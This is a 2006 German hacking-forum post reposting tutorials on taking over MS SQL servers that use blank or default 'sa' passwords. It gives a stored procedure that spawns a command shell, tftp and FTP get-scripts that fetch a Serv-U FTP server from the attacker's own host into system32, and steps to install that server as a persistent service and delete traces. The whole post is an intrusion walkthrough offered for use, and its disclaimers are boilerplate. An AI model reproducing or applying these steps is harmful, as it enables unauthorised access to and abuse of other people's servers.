Sql Hacks Rehacks

Newcomer - Board
Verfügbare Informationen zu "Sql Hacks Rehacks"

  • Qualität des Beitrags: 0 Sterne
  • Beteiligte Poster: 4dministr4t0r
  • Forum: Newcomer - Board
  • Forenbeschreibung: Forum für alle "Newcomer" (Alter, Geschlecht etc. egal), die sich im Bereich Systemsicherheit weiterbilden wollen. Chatten könnt Ihr am Ende der Seite!
  • aus dem Unterforum: Tutorials (Info-Texte)
  • Antworten: 1
  • Forum gestartet am: Samstag 23.12.2006
  • Sprache: deutsch
  • Link zum Originaltopic: Sql Hacks Rehacks
  • Letzte Antwort: vor 16 Jahren, 2 Monaten, 31 Tagen, 19 Stunden, 49 Minuten
  • Alle Beiträge und Antworten zu "Sql Hacks Rehacks"

    Re: Sql Hacks Rehacks

    4dministr4t0r - 26.12.2006, 20:35

    Sql Hacks Rehacks
    ##############################################################################################

    Alle hier geposteten Tutorials sind im www zu finden und nicht von mir. Sie werden unverändert hier dargestellt.

    Wir weisen ausdrücklich darauf hin, daß wir mit dieser Ansammlung nicht zu Straftaten aufrufen oder animieren wollen!!!
    Alle Tutorials dienen ausschließlich zu Informationszwecken.

    Solltest Du ein von Dir erstelltes Tutorial hier finden und mit der Veröffentlichung bei Hackressort nicht einverstanden sein, schick mir eine PM oder Email.

    Das Tutorial wird dann entfernt.

    Hackressort-Team

    ##############################################################################################


    SQL Haxx Tutorial
    #########################################################

    #########################
    # #
    # MsSQL Hack Tutorial #
    # Written bY h4p0 #
    # #
    # Server : irc.chillfactory.net #
    # Port : 6667 #
    # Channel: #ManiaC-FXP #
    # #
    ###################################################

    #########################

    ##########################
    # Als Aller Erstes!! #
    # #
    # Dieses Tutorial dient #
    # nur zu Lern Zwecken .. #
    # Ich Hafte NICHT für #
    # Entstehende Schäden #
    # oder sonst etwas!! #
    ##########################

    Folgendes wird Benötigt:

    1.) MsSQL Scannz z.B ( Found MSSQL Account 123.234.456.456 sa/[Null] )
    2.) Configurierte Serv-U.ini
    3.) Serv-U.exe
    4.) Einen HomeFTP oder nen Str0 bzw. Pub zum Upload der Serv-U Filez
    5.) SQLExec.exe ( Am besten Die mit dem Apfel Icon )
    6.) Zeit…

    *Hacken eines Secured SQL Servers*
    *Tutorial übersetzt und verbessert von :Frost*
    *Benutzung auf eigene Gefahr*
    *********************************************************************
    1)Index
    2)Benötigte TOols
    3)Infizieren eigenes Unterfangen
    4)Ausfürhren eigenes unterfangen

    1)
    So hier dieses Tutoarial Bringt euch bi Secured MSSQL
    server zu haxxorn aber ihr solltet bedenken das nur 55%
    der server zurechekcen sind.

    2)
    - einen Mssql server mit User/pw
    - SQLBrowser.exe
    - evtl nc.exe
    - tftp !!! Solarwinds TFTP SERVER ist gut smile
    - Unser script ( http://www.pstruh.cz/tips/detpg_cmdshell.htm )

    So Downloade und Starte SQLBrower.exe. An der rechten seite Enter IP USER und PW.
    Auf der Linken seite das text feld wo steht dir xp_cmdshell “dir c:\ ist das Command eingabe Feld.
    Nur Geben Wir das Script ins Command feld hinein http://www.pstruh.cz/tips/detpg_cmdshell.htm
    Oder nehmt das hier
    ———————————————

    CREATE PROCEDURE MeineNeueCMDSHELL(@cmd varchar(255), @Wait int = 0) AS
    –Create WScript.Shell object
    DECLARE @result int, @OLEResult int, @RunResult int
    DECLARE @ShellID int

    EXECUTE @OLEResult = sp_OACreate ‘WScript.Shell’, @ShellID OUT
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR (’CreateObject %0X’, 14, 1, @OLEResult)

    EXECUTE @OLEResult = sp_OAMethod @ShellID, ‘Run’, Null, @cmd, 0, @Wait
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR (’Run %0X’, 14, 1, @OLEResult)
    –If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult

    EXECUTE @OLEResult = sp_OADestroy @ShellID

    return @result

    —————————————————–

    Anstatt MeineNeueCMDSHELL am anfang könnt ihr auch Irgendwas anderes nehmen!

    Jetzt Klickt auf Connect und Schneller als du Glaubst *g* Bist du Connecten !

    Jetzt Können Mehrere Fehler kommen :

    - Bla bla did not Return any Results , Jaja Egal Es hat Geklappt Geh zum Nächsten schritt!
    - Anderer Fehler , Es hat nicht geklappt
    - Wenn kommt Execute oder Create permission appears , dann ist es nicht möglich ihn zu rehacken !
    - Syntax error on line ….. Jaja Das wird immerkommen WENN DU DIESES NICHT LIEST : IMMER SQL BOWER.exe
    - Maximiert Benutzen !

    4)
    Starten eigener Befehle
    Ihr müsst das gleiche Nehmen SQL Bower Zunge raus

    Paar Befehle zur erläuterung :

    MeineNeueCMDSHELL “tftp 129.0.0.0 59 get Servudaemon.exe”
    MeineNeueCMDSHELL “cmd.exe /c echo open >> temp”
    MeineNeueCMDSHELL “cmd.exe servudaemon.exe”
    Usw usw großes Grinsen

    Dir funzt leider nicht ! Aber man kann ja NC.exe Uppen und starten smile

    ————————————————————
    Ein paar Tipps

    Das einzige Problem ist hierbei allerdings nur das man den Befehl nicht sieht wenn er fertig ist,
    und das man nichts anzeigen lassen kann wie type , dir usw.
    Und wenn ihr einen Error Namens 8007000 Erhaltet dann bedeutet das , das die datei oder Programm
    was ihr ausfürhen wolltet NICHT existiert.

    Schlusswort :

    1.Ja ich bins Frost und Ich habe euch das Geile TUtorial Übersetzt smile

    2.Bitte Nur der Crew und engen Freunden Geben Freude

    So wirds Gemacht…

    1.) SQLExec Starten!

    2.) Bei Host schreibt Ihr die IP vom SQL Scan rein,
    In User kommt in FAST Jeden Fall Sa rein und
    In Pass schreibt Ihr Das Passwort vom SQL Scan rein Bei [Null] einfach Freilassen!

    3.) Guckt Immer Erst Wieviel Space Auf dem Server noch Vorhanden ist
    Das macht ihr so: DIR c:\ Zeigt an Wieviel Auf Pladde c: noch Frei ist!
    Dann könnt Ihr noch Gucken z.B DIR d:\ , DIR e:\ usw.

    4.) Denn müsst Ihr ein GET Script erstellen Um Die Serv-U Filez von Euren HomeFTP,Str0 oder Pub
    auf den Server zu holen ,das macht Ihr wie Folgt:

    ECHO OPEN [IP von HomeFTP,Str0,oder Pub] [Port]>>FTP.txt .. Bedeutet Das er eine Verbindung Zum HomeFTP Öffnet
    ECHO [Username des HomeFTP Accounts]>>FTP.txt .. Bedeutet Das ihr den Usernamen Des HomeFTP Accounts Angibt
    ECHO BINARY>>sql.txt .. Bedeutet Das ihr das Passwort Des HomeFTP Accounts Angibt
    ECHO lcd c:\WINNT\System32>>FTP.txt .. Bedeutet Das Er Die Filez Die ihr Hochladet Ins SYStemroot Ladet
    ECHO GET Serv-U.exe>>FTP.txt .. Bedeutet Das er Die Serv-U.exe holen soll
    ECHO GET Serv-U.ini>>FTP.txt .. Bedeutet Das er Die Serv-u.ini holen soll
    ECHO Quit>>FTP.txt .. Bedeutet Das Er von Eurem FTP Disconectet Wen er Die filez hat

    Beißpiel Euer Home Hat die IP 111.222.333.444 , den Port 21 , den Usernamen Test und das pw Test

    Echo Open 111.222.333.444 21>>FTP.txt
    Echo Test>>FTP.txt
    Echo Test>>FTP.txt
    Echo Binary>>FTP.txt
    Echo Lcd c:\winnt\System32>>FTP.txt
    Echo GET Serv-U.exe>>FTP.txt
    Echo GET Serv-U.ini>>FTP.txt
    Echo Quit>>FTP.txt

    5.) So Dann Habt Ihr das GET Script schonmal Fertig,um nun Die Filez zu
    Holen gibt ein: FTP.exe -s:FTP.txt Dann schmiert SQLExec ab Aber NICHT schließen
    sondern Warten bis Das Prog wieder Reagiert..

    6.) Wenns Dann wieder Reagiert Löscht Ihr Als aller Erstes mal Das GET Script
    Ansonsten Hinterlasst Ihr eure Ip ,Das macht Ihr so: DEL FTP.txt Soweit sogut!

    7.) Ihr Tragt Serv-U als Service ein Damit euer Server auch nach Reboot Besteht!
    Das macht ihr so: c:\Winnt\system32\Serv-U.exe /i
    Wenn der Server Statt Winnt Windows hat, denn c:\windows\system32…

    8.) Das Starten Der Serv-U.exe .. Das geht so: NET Start Serv-u
    Wenn es Nicht Geht Probiert mal Zuerst NET STOP Serv-u und danach Wieder Start

    So nun Ist der Server Fertig und Ihr könnt mit Eurem
    FTP-Programm Drauf Conecten und Fillen Lassen großes Grinsen
    Am besten wäre es noch wenn Ihr den Server Securen Würdet aber
    Das ist wieder eine Andere Sache

    Bei Fragen Oder wenn Ihr ein Bischen lernen bzw Chatten wollt Join unseren Channel
    Und nun Viel Spaß noch!

    ist wieder nicht von mir um den autro zu finden solltet ihr vlt den genannten irc chan joinen ;-)



    Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken



    Weitere Beiträge aus dem Forum Newcomer - Board

    Anfänger Tutorial - gepostet von 4dministr4t0r am Montag 25.12.2006
    Steinator - gepostet von Steinator am Samstag 10.02.2007
    Hallo an die Runde - gepostet von sebuka am Mittwoch 21.03.2007



    Ähnliche Beiträge wie "Sql Hacks Rehacks"

    Hacks Lebensgeschichte (auch trauergeschichte genannt) - Hack (Dienstag 10.05.2005)
    Die Aktuelsten Pokemon S/G/K hacks - romking (Sonntag 29.01.2006)
    Trojaner und andere Hacks - Memoire (Dienstag 13.02.2007)
    Google - Hacks - 4dministr4t0r (Montag 25.12.2006)
    CS 1.6, CSS Hacks - [GodTM]_kanYe (Mittwoch 13.09.2006)
    Diablo2 - tools , hacks , downloads - azumit (Donnerstag 25.05.2006)
    Hacks - darkraistlin (Dienstag 23.01.2007)
    Cheats,Hacks,Downloads - cherrymoon (Freitag 08.02.2008)
    MSN Messenger 6.x Hacks! - <=HHG=>sSwizZz (Sonntag 16.05.2004)
    eAMirrows Txt Svn Sql - keny16 (Mittwoch 24.05.2006)